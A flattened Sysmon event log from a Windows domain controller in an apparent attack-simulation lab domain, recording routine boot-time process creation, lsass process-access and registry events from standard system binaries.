12:00:43.002{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.971{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.971{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.534{266CAFBE-646A-6064-0B00-00000000AE01}856860C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+4f6cc|C:\Windows\system32\lsasrv.dll+5817f|C:\Windows\system32\lsasrv.dll+636ee|C:\Windows\system32\lsass.exe+2086|C:\Windows\system32\lsass.exe+1e11|C:\Windows\system32\lsass.exe+1551|C:\Windows\system32\lsass.exe+4708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.362{266CAFBE-646A-6064-0700-00000000AE01}696700C:\Windows\system32\wininit.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1000000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wininit.exe+b9e0|C:\Windows\system32\wininit.exe+94ff|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.362{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.362{266CAFBE-646A-6064-0700-00000000AE01}696700C:\Windows\system32\wininit.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.364{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exe10.0.14393.2580 (rs1_release_inmarket.181009-1745)Local Security Authority ProcessMicrosoft® Windows® Operating SystemMicrosoft Corporationlsass.exeC:\Windows\system32\lsass.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=5AE8589CDDE46ED132AEF8280BC8894A,SHA256=D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4,IMPHASH=0AA67FE637515AC7535797573607EAA2{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\System32\wininit.exewininit.exe 10341000x80000000000000001041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.252{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.252{266CAFBE-646A-6064-0700-00000000AE01}696700C:\Windows\system32\wininit.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+5977|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.241{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exe10.0.14393.4169 (rs1_release.210107-1130)Services and Controller appMicrosoft® Windows® Operating SystemMicrosoft Corporationservices.exeC:\Windows\system32\services.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=FEFC26105685C70D7260170489B5B520,SHA256=930F44F9A599937BDB23CF0C7EA4D158991B837D2A0975C15686CDD4198808E8,IMPHASH=A1C9FD59764D67AA201947276212F7CF{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\System32\wininit.exewininit.exe 10341000x80000000000000001038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.096{266CAFBE-6469-6064-0600-00000000AE01}688692C:\Windows\System32\smss.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.090{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e71SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{266CAFBE-6469-6064-0600-00000000AE01}688C:\Windows\System32\smss.exe- 10341000x80000000000000001036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.065{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{266CAFBE-646A-6064-0800-00000000AE01}704C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 13241300x80000000000000001035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:42.002{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Domainattackrange.local 13241300x80000000000000001034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:42.002{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Hostnamewin-dc-892 10341000x80000000000000001033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.002{266CAFBE-6469-6064-0400-00000000AE01}616620C:\Windows\System32\smss.exe{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.000{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\System32\wininit.exe10.0.14393.2273 (rs1_release_1.180427-1811)Windows Start-Up ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWinInit.exewininit.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=5A998F811D7805B79B8E769027F62FD2,SHA256=8694C5732D26921EEA29589A9FA4182139EF3D9EA6B6D0ACCA8994B4AA5DEFE5,IMPHASH=C8D526C4E61942E1B11AE4B7EE2DDE5D{266CAFBE-6469-6064-0400-00000000AE01}616C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000ac 0000007c 10341000x80000000000000001031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.002{266CAFBE-6469-6064-0600-00000000AE01}688692C:\Windows\System32\smss.exe{266CAFBE-646A-6064-0800-00000000AE01}704C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.003{266CAFBE-646A-6064-0800-00000000AE01}704C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e71SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{266CAFBE-6469-6064-0600-00000000AE01}688C:\Windows\System32\smss.exe- 10341000x80000000000000001029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.987{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{266CAFBE-6469-6064-0600-00000000AE01}688C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.987{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{266CAFBE-6469-6064-0600-00000000AE01}688C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.997{266CAFBE-6469-6064-0600-00000000AE01}688C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000e0 0000007c C:\Windows\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e71SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{266CAFBE-6467-6064-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x80000000000000001026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.987{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 13241300x80000000000000001025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:41.893{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\VolatileSettings\{5b45201d-f2f2-4f3b-85bb-30ff1f953599}Binary Data 13241300x80000000000000001024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:41.893{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\Video\ServiceBasicDisplay 13241300x80000000000000001023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:41.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:41.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\CountDWORD (0x00000001) 13241300x80000000000000001021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:41.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\0DISPLAY\Default_Monitor\4&69f2b1a&0&UID0 10341000x80000000000000001020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.846{266CAFBE-6469-6064-0400-00000000AE01}616620C:\Windows\System32\smss.exe{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.851{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{266CAFBE-6469-6064-0400-00000000AE01}616C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000ac 0000007c 10341000x80000000000000001018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.706{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}616C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.706{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}616C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:41.715{266CAFBE-6469-6064-0400-00000000AE01}616C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000ac 0000007c C:\Windows\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{266CAFBE-6467-6064-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x80000000000000001015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.799{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Leave)Binary Data 10341000x80000000000000001014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:39.799{266CAFBE-6467-6064-0200-00000000AE01}432436C:\Windows\System32\smss.exe{266CAFBE-6467-6064-0300-00000000AE01}572C:\Windows\system32\autochk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+4f84|\SystemRoot\System32\smss.exe+20b6|\SystemRoot\System32\smss.exe+65b2|\SystemRoot\System32\smss.exe+a3bb|\SystemRoot\System32\smss.exe+1652|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000001013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:39.789{266CAFBE-6467-6064-0300-00000000AE01}572C:\Windows\System32\autochk.exe10.0.14393.4283 (rs1_release.210303-1802)Auto Check UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationAutoChk.Exe\??\C:\Windows\system32\autochk.exe /q /v *C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=A782E5C76170546278F1654332F3DA46,SHA256=CCA83B3DDE1DACFB121299E9468D52D57582E805F273234166F5EB001543AC31,IMPHASH=1BF5E4792E849FE3BCFE23E7C1B21A3F{266CAFBE-6467-6064-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x80000000000000001012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x80000000000000001011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x80000000000000001010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x80000000000000001009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x80000000000000001008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x80000000000000001007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x80000000000000001006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x80000000000000001005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.784{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x80000000000000001004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.768{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Enter)Binary Data 13241300x80000000000000001003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.768{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\XEN\Unplug\NICSDWORD (0x00000001) 13241300x80000000000000001002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Enum\XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0\FriendlyNameAWS PV Network Device #0 13241300x80000000000000001001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\DriverMinorVersionDWORD (0x00000002) 13241300x80000000000000001000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\DriverMajorVersionDWORD (0x00000008) 13241300x8000000000000000999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\NdisMinorVersionDWORD (0x00000001) 13241300x8000000000000000998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 